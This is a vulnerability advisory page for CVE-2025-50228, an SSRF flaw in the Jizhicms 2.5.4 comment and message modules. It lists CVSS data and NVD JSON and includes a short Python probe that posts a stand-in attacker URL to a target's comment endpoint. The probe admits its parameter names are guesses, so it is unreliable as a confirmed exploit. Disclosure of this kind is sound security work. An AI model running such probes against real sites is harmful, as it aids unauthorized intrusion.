Security Vulnerability Report
中文
CVE-2025-50228 CVSS 9.1 CRITICAL

CVE-2025-50228

Published: 2026-04-09 15:16:07
Last Modified: 2026-04-14 20:11:40

Description

Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in User Evaluation, Message, and Comment modules.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:jizhicms:jizhicms:2.5.4:*:*:*:*:*:*:* - VULNERABLE
Jizhicms 2.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example: http://target.com/index.php/comment/add) target_url = "http://target.com/index.php/comment/add" # Attacker controlled server for monitoring DNS/HTTP requests (e.g., Burp Collaborator) attacker_server = "http://attacker-controlled-domain.com" # Payload attempting to trigger SSRF via the comment content field # Note: Parameter names may vary based on actual form implementation payload = { "content": "Check this out: " + attacker_server, "username": "ssrf_tester", "submit": "submit" } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check your server logs to see if the target requested the URL.") print("[+] Response from target:", response.text[:200]) else: print("[-] Failed to send payload. Status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50228", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:07.433", "lastModified": "2026-04-14T20:11:40.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in User Evaluation, Message, and Comment modules."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "3A6DA195-4F19-4389-A7AE-D6782136A2A8"}]}]}], "references": [{"url": "https://github.com/Cherry-toto/jizhicms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Cherry-toto/jizhicms/issues/104", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.jizhicms.cn", "source": "[email protected]", "tags": ["Product"]}]}}